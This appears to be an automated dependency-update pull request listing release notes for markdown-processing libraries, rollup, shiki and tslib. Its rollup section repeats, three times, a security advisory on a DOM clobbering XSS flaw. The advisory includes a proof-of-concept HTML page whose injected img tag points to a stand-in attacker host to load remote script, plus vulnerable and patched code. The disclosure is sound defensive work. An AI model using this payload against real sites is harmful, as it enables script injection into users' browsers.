  • 12a5622 Update micromark, change buffers to Uint8Arrays
    migrate: see micromark@4.
    only really changes Buffer -> Uint8Array, so use encodings supported by TextDecoder
  • 4cbea5a Change to require Node.js 16
    migrate: update too

Change (when you make extensions)

  • 03581b3 Change to replace getter/setters with raw data
    migrate: this.getData('x') -> this.data.x, this.setData('x', 1) -> this.data.x = 1
  • 18f4bb0 Change to return undefined from enter, exit
    migrate: keep the node you pass to enter around; get the node yourself before exit
  • 88969a4 Remove deprecated OnError type
    migrate: OnError -> OnEnterError

Full Changelog: 1.3.1...2.0.0

1.3.1

  • 13430aa Update types for changes in micromark-util-types

Full Changelog: 1.3.0...1.3.1

1.3.0

Types

  • a034fa6 Add CompileData type to track custom data

Full Changelog: 1.2.1...1.3.0

1.2.1

Misc

Full Changelog: 1.2.0...1.2.1

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 53 commits:

↗️ mdast-util-gfm (indirect, 2.0.1 → 3.0.0) · Repo

Release Notes

3.0.0

Change

  • d40848e Update @types/mdast, mdast utilities
    migrate: update too
  • 3f1a762 Change to require Node.js 16
    migrate: update too
  • 812337d Change to use exports
    migrate: don’t use private APIs

Full Changelog: 2.0.2...3.0.0

2.0.2

Misc

Full Changelog: 2.0.1...2.0.2

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 25 commits:

↗️ mdast-util-to-hast (indirect, 12.2.4 → 13.2.0) · Repo

Release Notes

13.2.0

Types

  • 24f4576 Add type for data.meta on elements to hast

Full Changelog: 13.1.0...13.2.0

13.1.0

Add

  • 59ecd14 Add support for file in options

Full Changelog: 13.0.2...13.1.0

13.0.2

Full Changelog: 13.0.1...13.0.2

13.0.1

Fix

  • 7ff28fb Fix trimming of whitespace around breaks

Full Changelog: 13.0.0...13.0.1

13.0.0

Change

  • 67ef76c Update @types/hast, @types/mdast, utilities
    migrate: update too
  • b815f5e Change to require Node.js 16
    migrate: update too
  • 33442cc Change to use exports
    migrate: don’t use private APIs
  • 56c88e4 Fix to match GH for HTML generated for backreferences
    migrate: use the function form of footnoteBackLabel for i18n, see defaultFootnoteBackLabel for inspiration
  • ffe7e47 Change to always return a node
    migrate: expect an empty root instead of nothing
  • ffbb8a8 Change to expect, yield undefined
    migrate: expect undefined everywhere, not null
  • c13fe7f Change to remove support for Footnote nodes
    migrate: use GFM, which does not have “inline” notes
  • 6fc783a Change to remove support for ancient lang on code with spaces
    migrate: you’re fine, this hasn’t been a thing for years
  • 72b8a68 Change to use maps for definitions on state
    migrate: if you make your own handles, expect maps
  • b328aa9 Change to remove function form of State, use plain object
    migrate: if you make your own handles, create nodes yourself, use state.applyData if needed
  • 40e1d29 Change to remove all, one helpers
    migrate: if you make your own handles, use state.all, state.one
  • 1894044 Change to remove H type
    migrate: use State
  • e804231 Change to remove complex-types.d.ts
    migrate: use main module
  • 4df5d41 Change to deep clone passed through nodes
    migrate: should be fine

Types

  • 52905eb Add smarter types for passThrough
    migrate: type your mdast/hast nodes by extending the content interfaces
  • 6f555a0 Add supported data fields to Data of mdast
    migrate: pass correct values in node.data

Fix

  • 3e300ea Fix to keep content around for hName on text

Full Changelog: 12.3.0...13.0.0

12.3.0

Add

  • ed45ec4 Add wrap helper on state
  • e701470 Add one, all helpers to state

Fix

  • 0c67e83 Fix footnote keys such as constructor
  • 1c2cb7b Fix support for passing just a table row, cell

Misc

Full Changelog: 12.2.6...12.3.0

12.2.6

Misc

  • 3098beb Fix missing internal type

Full Changelog: 12.2.5...12.2.6

12.2.5

Full Changelog: 12.2.4...12.2.5

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 64 commits:

↗️ mdast-util-to-markdown (indirect, 1.3.0 → 2.1.2) · Repo

Release Notes

2.1.2

  • b0a91ea Fix crash in more complex content around attention

Full Changelog: 2.1.1...2.1.2

2.1.1

Fix

  • 97fb818 Fix roundtripping of attention by encoding surroundings

Types

Full Changelog: 2.1.0...2.1.1

2.1.0

Add

  • 5fd2f1e Add compilePattern helper to state

Full Changelog: 2.0.0...2.1.0

2.0.0

Change

  • 6e5e12d Change to require Node.js 16
    migrate: update too
  • d27d04d Update @types/mdast and friends
    migrate: update too
  • 5c90701 Change to use exports map
    migrate: don’t use private APIs
  • 89d0f5b Remove bulletOrderedOther, always use other bullets
    migrate: you can remove bulletOrderedOther if you passed it, it’s now the default
  • 7f91d06 Change fences default to true
    migrate: you can remove fences: true if you passed it, explicitly set it to
    false if you want that, but fenced code is better than indented code
  • 019f25f Change listItemIndent default from 'tab' (size) to 'one'
    migrate: you can remove listItemIndent: 'one' if you passed it, explicitly set it to
    'tab' if you want that
  • 5b496da Remove ancient undocument support for listItemIndent: 1
    migrate: 1 -> 'one'
  • 2fcac46 Remove Context type alias
    migrate: Context -> State
  • 445c51a Remove SafeOptions type alias
    migrate: SafeOptions -> Info

Full Changelog: 1.5.0...2.0.0

1.5.0

Fix

  • 122101f Fix to not generate blank lines for phrasing roots

Add

  • 21a7d0a Add export of defaultHandlers
  • 070ad5f Add associationId helper to state
  • 35ceafc Add createTracker helper on state
  • e9f71aa Add safe helper on state
  • 19301e7 Add containerPhrasing, containerFlow helpers on state
  • a638e2a Add indentLines helper on state

Misc

  • d2108dd Refactor types to use node types, not strings
  • 35a9ccc Add registry for construct names
  • 501f668 Add support for null as input in types
  • e812c79 Add improved docs

Full Changelog: 1.4.0...1.5.0

1.4.0

Full Changelog: 1.3.0...1.4.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 63 commits:

↗️ mdast-util-to-string (indirect, 3.1.0 → 4.0.0) · Repo

Release Notes

4.0.0

Change

  • 6f7f7cf Change to require Node.js 16
    migrate: update too
  • f77cf68 Change to use export map
    migrate: don’t use private APIs

Full Changelog: 3.2.0...4.0.0

3.2.0

Feat

Full Changelog: 3.1.1...3.2.0

3.1.1

Misc

Full Changelog: 3.1.0...3.1.1

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 29 commits:

↗️ micromark (indirect, 3.1.0 → 4.0.1) · Repo

Release Notes

4.0.1

Performance

  • f955251 Refactor to improve performance of resolveAllLabelEnd

Miscellaneous

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ micromark-extension-gfm-strikethrough (indirect, 1.0.4 → 2.1.0) · Repo

Release Notes

2.1.0

Full Changelog: 2.0.0...2.1.0

2.0.0

  • c6c9efd Change to require Node.js 16
    migrate: update Node
  • 75b799b Change to expose functions
    migrate: gfmStrikethroughHtml -> gfmStrikethroughHtml()
  • 78fe632 Update micromark

Full Changelog: 1.0.7...2.0.0

1.0.7

Fix

Full Changelog: 1.0.6...1.0.7

1.0.6

Types

  • 36a6b6d Update types for changes in micromark-util-types

Full Changelog: 1.0.5...1.0.6

1.0.5

Full Changelog: 1.0.4...1.0.5

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 39 commits:

↗️ micromark-extension-gfm-table (indirect, 1.0.5 → 2.1.0) · Repo

Release Notes

2.1.0

Full Changelog: 2.0.0...2.1.0

2.0.0

Change

  • da8dc23 Change to require Node.js 16
    migrate: update Node
  • 57a0069 Change to expose functions
    migrate: gfmTable -> gfmTable()
  • b2ebed6 Update micromark

Full Changelog: 1.0.7...2.0.0

1.0.7

Types

  • a59da0b Update types for changes in micromark-util-types

Full Changelog: 1.0.6...1.0.7

1.0.6

Perf

  • 9033e98 Refactor code to match markdown-rs, fix perf

Misc

Full Changelog: 1.0.5...1.0.6

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 38 commits:

↗️ micromark-util-symbol (indirect, 1.0.1 → 2.0.1) · Repo

Sorry, we couldn’t find anything useful about this release.

↗️ nlcst-to-string (indirect, 3.1.0 → 4.0.0) · Repo

Release Notes

4.0.0

Change

  • a3ff3fc Update @types/nlcst
    migrate: update too
  • e4b95c3 Change to require Node.js 16
    migrate: update too
  • 0f4c52c Change to use exports
    migrate: don’t use private APIs
  • b1ba622 Remove separator
    migrate: afaik nobody used this

Full Changelog: 3.1.1...4.0.0

3.1.1

Misc

Full Changelog: 3.1.0...3.1.1

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 25 commits:

↗️ parse-latin (indirect, 5.0.1 → 7.0.0) · Repo

Release Notes

7.0.0

Change

  • 8fe6893 Update @types/nlcst, @types/unist, utilities
    migrate: update too
  • ad2d932 Change to require Node.js 16
    migrate: update too
  • 6ce04d2 Change to use exports
    migrate: don’t use private APIs
  • 1d96ee6 Change to use undefined for doc field
    migrate: expect undefined

Full Changelog: 6.0.2...7.0.0

6.0.2

Patch

Misc

Full Changelog: 6.0.1...6.0.2

6.0.1

Misc

  • 379499e Fix crash on nodes without positional info

Full Changelog: 6.0.0...6.0.1

6.0.0

  • 54baf82 Add types, remove position, use, useFirst
    feature: add types
    breaking: remove position field (use unist-util-remove-position if you previously set position: false)
    breaking: remove support for use, useFirst (manipulate the lists of plugins yourself)
    patch: fix support for CR, CRLF line endings
  • 4d1626d Add improved docs

Full Changelog: 5.0.1...6.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 36 commits:

↗️ preferred-pm (indirect, 3.0.3 → 4.0.0) · Repo

Sorry, we couldn’t find anything useful about this release.

↗️ property-information (indirect, 6.2.0 → 6.5.0) · Repo

Release Notes

6.5.0

  • 5eb7b1a Add shadowRootClonable, writingSuggestions

Full Changelog: 6.4.1...6.5.0

6.4.1

  • 172b09b Fix candidate capture to be string

Full Changelog: 6.4.0...6.4.1

6.4.0

  • 4f47923 Add onBeforeToggle, shadowRootDelegatesFocus, shadowRootMode

Full Changelog: 6.3.0...6.4.0

6.3.0

Data

  • d2b13fb Add blocking, fetchPriority, inert, popover, etc

Miosc

Full Changelog: 6.2.0...6.3.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 14 commits:

↗️ rehype (indirect, 12.0.1 → 13.0.2) · Repo · Changelog

Release Notes

13.0.2

(note: this is a patch of all packages)

Miscellaneous

Types

Documentation

Full Changelog: 13.0.1...13.0.2

13.0.1

Types

  • 372da4d Add augmentation of settings types to rehype

Full Changelog: 13.0.0...13.0.1

13.0.0

Change

  • f6b628d Update unified, unified-args, @types/hast, etc
    migrate: update too
    if you passed an entities option to rehype/rehype-stringify, change it to characterReferences
    if you use rehype-cli, expect dotfiles to be included by default, add them to an ignore file if you don’t want them
  • 830757d Change to require Node.js 16
    migrate: update too
  • 17079b0 Change to use exports
    migrate: don’t use private APIs

Add

  • 7c9115b Add typed settings
    migrate: don’t use private APIs

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 62 commits:

↗️ rehype-parse (indirect, 8.0.4 → 9.0.1) · Repo · Changelog

Release Notes

9.0.1

See rehype-parse@6.0.2 and rehype-stringify@6.0.1

Project

9.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 19 commits:

↗️ rehype-raw (indirect, 6.1.1 → 7.0.0) · Repo

Release Notes

7.0.0

Change

  • cdbb980 Update hast-util-raw, @types/hast
    migrate: update too
  • 9a794bb Change to require Node.js 16
    migrate: update too
  • cd34249 Change to use exports
    migrate: don’t use private APIs

Full Changelog: 6.1.1...7.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 15 commits:

↗️ rehype-stringify (indirect, 9.0.3 → 10.0.1) · Repo · Changelog

Release Notes

10.0.1

10.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 4 commits:

↗️ remark-gfm (indirect, 3.0.1 → 4.0.0) · Repo

Release Notes

4.0.0

Change

  • b8cc334 Update @types/mdast, unified, utilities
    migrate: update too
  • 9eb0f54 Change to use exports
    migrate: don’t use private APIs
  • 5715c93 Change to require Node.js 16
    migrate: update too

Full Changelog: 3.0.1...4.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 26 commits:

↗️ remark-parse (indirect, 10.0.1 → 11.0.0) · Repo · Changelog

Release Notes

11.0.0

Breaking

Project

  • a47c3c9 Add more links to unified for examples of use
  • a93db25 Remove community health files
  • 1578bdf Refactor prose
  • 70ada4a Move URLs from HTTP to HTTPS
  • edb284a Add more badges

Plugins

  • 927083c Add remark-code-frontmatter to plugins
  • 0ee5336 Add remark-code-extra to List of Plugins
  • 5d13f8e Update list of plugins
  • cc7867b Add remark-tree-sitter to list of plugins
  • cca8385 Add remark-sectionize to plugins.md
  • f4230e3 Add remark-capitalize to list of plugins
  • cf52183 Add remark-utf8s and remark-code-screenshot to list of plugins
  • caaf374 Add remark-redactable to list of plugins

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 44 commits:

↗️ remark-rehype (indirect, 10.1.0 → 11.1.1) · Repo

Release Notes

11.1.1

Fix

  • f0cce2d Fix mutate support in unified-engine

Miscellaneous

Types

Full Changelog: 11.1.0...11.1.1

11.1.0

Add

  • 0174dfc Add file to options passed to mdast-util-to-hast

Full Changelog: 11.0.0...11.1.0

11.0.0

Change

  • 30091c7 Change to require Node.js 16
    migrate: update too
  • cafeacc Change to use exports
    migrate: don’t use private APIs
  • acb292a Update mdast-util-to-hast, @types/{hast,mdast}, unified, etc
    migrate: update too
    if you don’t use handlers, this should be fine;
    if you do, see mdast-util-to-hast@13.0.0
  • ba50965 Remove Processor type
    migrate: get it from unified

Add

  • b990986 Add exports of defaultFootnoteBackContent, defaultFootnoteBackLabel

Full Changelog: 10.1.0...11.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 33 commits:

↗️ remark-smartypants (indirect, 2.0.0 → 3.0.2) · Repo

Release Notes

3.0.2

What's Changed

New Contributors

Full Changelog: v3.0.1...v3.0.2

3.0.1

What's Changed

  • remove tsconfig.build.tsbuildinfo from publish by @bluwy in #85

New Contributors

  • @bluwy made their first contribution in #85

Full Changelog: v3.0.0...v3.0.1

3.0.0

Update TypeScript definiition for unified v11 🚀 Thanks @mashehu for the help!

From the development side we also migrated the source code to TypeScript, so future updates should be safer.

Let us know if you find any regressions!

2.1.0

So far this plugin had trouble with nested use cases like adding quotes around links ("[example](https://example.com)") and inline code ("`code`") — it wouldn't recognize that the 2nd quote is the closing quote and turn them into proper smart quotes. Thankfully @dimaMachina and @2wheeh helped with handling these inception cases much better 💪

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ retext (indirect, 8.1.0 → 9.0.0) · Repo · Changelog

Release Notes

9.0.0

Change

  • a4987d7 Update @types/nlcst, unified, utilities, etc
    migrate: update too
  • 252453a Change to require Node.js 16
    migrate: update too
  • e719bf4 Change to use exports
    migrate: don’t use private APIs
  • 67cef52 Remove parser exports
    migrate: get them from parse-english and similar

Misc

Full Changelog: 8.1.0...9.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 32 commits:

↗️ retext-smartypants (indirect, 5.2.0 → 6.2.0) · Repo

Release Notes

6.2.0

Add

  • f8f9683 Add support for live typing 3 dashes

Full Changelog: 6.1.1...6.2.0

6.1.1

  • b4629a7 Fix quote surrounded by punctuation near end of string

Full Changelog: 6.1.0...6.1.1

6.1.0

Full Changelog: 6.0.0...6.1.0

6.0.0

Change

  • 11271dd Update @types/nlcst, unified, utilities, etc
    migrate: update too
  • 1f0d960 Change to use exports
    migrate: update too
  • d79c475 Change to require Node.js 16
    migrate: don’t use private APIs

Full Changelog: 5.2.0...6.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 28 commits:

↗️ rollup (indirect, 2.79.1 → 4.28.1) · Repo · Changelog

Security Advisories 🚨

🚨 DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS

Summary

We discovered a DOM Clobbering vulnerability in rollup when bundling scripts that use import.meta.url or with plugins that emit and reference asset files from code in cjs/umd/iife format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

It's worth noting that we’ve identifed similar issues in other popular bundlers like Webpack (CVE-2024-43788), which might serve as a good reference.

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadget found in rollup

We have identified a DOM Clobbering vulnerability in rollup bundled scripts, particularly when the scripts uses import.meta and set output in format of cjs/umd/iife. In such cases, rollup replaces meta property with the URL retrieved from document.currentScript.

rollup/src/ast/nodes/MetaProperty.ts

Lines 157 to 162 in b86ffd7

const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
getResolveUrl(
`'${escapeId(relativePath)}', ${
umd ? `typeof document === 'undefined' ? location.href : ` : ''
}document.currentScript && document.currentScript.src || document.baseURI`
);

rollup/src/ast/nodes/MetaProperty.ts

Lines 180 to 185 in b86ffd7

const getUrlFromDocument = (chunkId: string, umd = false) =>
`${
umd ? `typeof document === 'undefined' ? location.href : ` : ''
}(${DOCUMENT_CURRENT_SCRIPT} && ${DOCUMENT_CURRENT_SCRIPT}.src || new URL('${escapeId(
chunkId
)}', document.baseURI).href)`;

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element (e.g., an img tag ) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

PoC

Considering a website that contains the following main.js script, the devloper decides to use the rollup to bundle up the program: rollup main.js --format cjs --file bundle.js.

var s = document.createElement('script')
s.src = import.meta.url + 'extra.js'
document.head.append(s)

The output bundle.js is shown in the following code snippet.

'use strict';

var _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;
var s = document.createElement('script');
s.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && False && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';
document.head.append(s);

Adding the rollup bundled script, bundle.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server due to the introduced gadget during bundling. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>rollup Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="bundle.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include rollup-bundled files (configured with an output format of cjs, iife, or umd and use import.meta) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

Patching the following two functions with type checking would be effective mitigations against DOM Clobbering attack.

const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
	getResolveUrl(
		`'${escapeId(relativePath)}', ${
			umd ? `typeof document === 'undefined' ? location.href : ` : ''
		}document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`
	);

const getUrlFromDocument = (chunkId: string, umd = false) =>
	`${
		umd ? `typeof document === 'undefined' ? location.href : ` : ''
	}(${DOCUMENT_CURRENT_SCRIPT} && ${DOCUMENT_CURRENT_SCRIPT}.tagName.toUpperCase() === 'SCRIPT' &&${DOCUMENT_CURRENT_SCRIPT}.src || new URL('${escapeId(
		chunkId
	)}', document.baseURI).href)`;

🚨 DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS

Summary

We discovered a DOM Clobbering vulnerability in rollup when bundling scripts that use import.meta.url or with plugins that emit and reference asset files from code in cjs/umd/iife format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

It's worth noting that we’ve identifed similar issues in other popular bundlers like Webpack (CVE-2024-43788), which might serve as a good reference.

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadget found in rollup

We have identified a DOM Clobbering vulnerability in rollup bundled scripts, particularly when the scripts uses import.meta and set output in format of cjs/umd/iife. In such cases, rollup replaces meta property with the URL retrieved from document.currentScript.

rollup/src/ast/nodes/MetaProperty.ts

Lines 157 to 162 in b86ffd7

const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
getResolveUrl(
`'${escapeId(relativePath)}', ${
umd ? `typeof document === 'undefined' ? location.href : ` : ''
}document.currentScript && document.currentScript.src || document.baseURI`
);

rollup/src/ast/nodes/MetaProperty.ts

Lines 180 to 185 in b86ffd7

const getUrlFromDocument = (chunkId: string, umd = false) =>
`${
umd ? `typeof document === 'undefined' ? location.href : ` : ''
}(${DOCUMENT_CURRENT_SCRIPT} && ${DOCUMENT_CURRENT_SCRIPT}.src || new URL('${escapeId(
chunkId
)}', document.baseURI).href)`;

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element (e.g., an img tag ) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

PoC

Considering a website that contains the following main.js script, the devloper decides to use the rollup to bundle up the program: rollup main.js --format cjs --file bundle.js.

var s = document.createElement('script')
s.src = import.meta.url + 'extra.js'
document.head.append(s)

The output bundle.js is shown in the following code snippet.

'use strict';

var _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;
var s = document.createElement('script');
s.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && False && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';
document.head.append(s);

Adding the rollup bundled script, bundle.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server due to the introduced gadget during bundling. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>rollup Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="bundle.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include rollup-bundled files (configured with an output format of cjs, iife, or umd and use import.meta) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

Patching the following two functions with type checking would be effective mitigations against DOM Clobbering attack.

const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
	getResolveUrl(
		`'${escapeId(relativePath)}', ${
			umd ? `typeof document === 'undefined' ? location.href : ` : ''
		}document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`
	);

const getUrlFromDocument = (chunkId: string, umd = false) =>
	`${
		umd ? `typeof document === 'undefined' ? location.href : ` : ''
	}(${DOCUMENT_CURRENT_SCRIPT} && ${DOCUMENT_CURRENT_SCRIPT}.tagName.toUpperCase() === 'SCRIPT' &&${DOCUMENT_CURRENT_SCRIPT}.src || new URL('${escapeId(
		chunkId
	)}', document.baseURI).href)`;

🚨 DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS

Summary

We discovered a DOM Clobbering vulnerability in rollup when bundling scripts that use import.meta.url or with plugins that emit and reference asset files from code in cjs/umd/iife format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

It's worth noting that we’ve identifed similar issues in other popular bundlers like Webpack (CVE-2024-43788), which might serve as a good reference.

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadget found in rollup

We have identified a DOM Clobbering vulnerability in rollup bundled scripts, particularly when the scripts uses import.meta and set output in format of cjs/umd/iife. In such cases, rollup replaces meta property with the URL retrieved from document.currentScript.

rollup/src/ast/nodes/MetaProperty.ts

Lines 157 to 162 in b86ffd7

const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
getResolveUrl(
`'${escapeId(relativePath)}', ${
umd ? `typeof document === 'undefined' ? location.href : ` : ''
}document.currentScript && document.currentScript.src || document.baseURI`
);

rollup/src/ast/nodes/MetaProperty.ts

Lines 180 to 185 in b86ffd7

const getUrlFromDocument = (chunkId: string, umd = false) =>
`${
umd ? `typeof document === 'undefined' ? location.href : ` : ''
}(${DOCUMENT_CURRENT_SCRIPT} && ${DOCUMENT_CURRENT_SCRIPT}.src || new URL('${escapeId(
chunkId
)}', document.baseURI).href)`;

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element (e.g., an img tag ) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

PoC

Considering a website that contains the following main.js script, the devloper decides to use the rollup to bundle up the program: rollup main.js --format cjs --file bundle.js.

var s = document.createElement('script')
s.src = import.meta.url + 'extra.js'
document.head.append(s)

The output bundle.js is shown in the following code snippet.

'use strict';

var _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;
var s = document.createElement('script');
s.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && False && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';
document.head.append(s);

Adding the rollup bundled script, bundle.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server due to the introduced gadget during bundling. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>rollup Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="bundle.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include rollup-bundled files (configured with an output format of cjs, iife, or umd and use import.meta) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

Patching the following two functions with type checking would be effective mitigations against DOM Clobbering attack.

const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
	getResolveUrl(
		`'${escapeId(relativePath)}', ${
			umd ? `typeof document === 'undefined' ? location.href : ` : ''
		}document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`
	);

const getUrlFromDocument = (chunkId: string, umd = false) =>
	`${
		umd ? `typeof document === 'undefined' ? location.href : ` : ''
	}(${DOCUMENT_CURRENT_SCRIPT} && ${DOCUMENT_CURRENT_SCRIPT}.tagName.toUpperCase() === 'SCRIPT' &&${DOCUMENT_CURRENT_SCRIPT}.src || new URL('${escapeId(
		chunkId
	)}', document.baseURI).href)`;
Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 8 commits:

↗️ shiki (indirect, 0.11.1 → 1.24.2) · Repo · Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 6 commits:

⁉️ sprintf-js (downgrade, 1.1.2 → 1.0.3) · Repo · Changelog

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ tslib (indirect, 2.4.1 → 2.8.1) · Repo

Release Notes

2.8.1

What's Changed

Full Changelog: v2.8.0...v2.8.1

2.8.0

What's Changed

Full Changelog: v2.7.0...v2.8.0

2.7.0

What's Changed

  • Implement deterministic collapse of await in await using by @rbuckton in #262
  • Use global 'Iterator.prototype' for downlevel generators by @rbuckton in #267

Full Changelog: v2.6.3...v2.7.0

2.6.3

What's Changed

Full Changelog: v2.6.2...v2.6.3

2.6.2

What's Changed

Full Changelog: v2.6.1...v2.6.2

2.6.1

What's Changed

Full Changelog: 2.6.0...v2.6.1

2.6.0

What's Changed

Full Changelog: v2.5.3...2.6.0

2.5.3

What's Changed

Full Changelog: 2.5.2...v2.5.3

2.5.2

This release explicitly re-exports helpers to work around TypeScript's incomplete symbol resolution for tslib.

2.5.1

This release of tslib provides fixes for two issues.

First, it reverses the order of init hooks provided by decorators to correctly reflect proposed behavior.

Second, it corrects the exports field of tslib's package.json and provides accurate declaration files so that it may be consumed under the node16 and bundler settings for moduleResolution.

2.5.0

What's New

  • Fix asyncDelegator reporting done too early by @apendua in #187
  • Add support for TypeScript 5.0's __esDecorate and related helpers by @rbuckton in #193

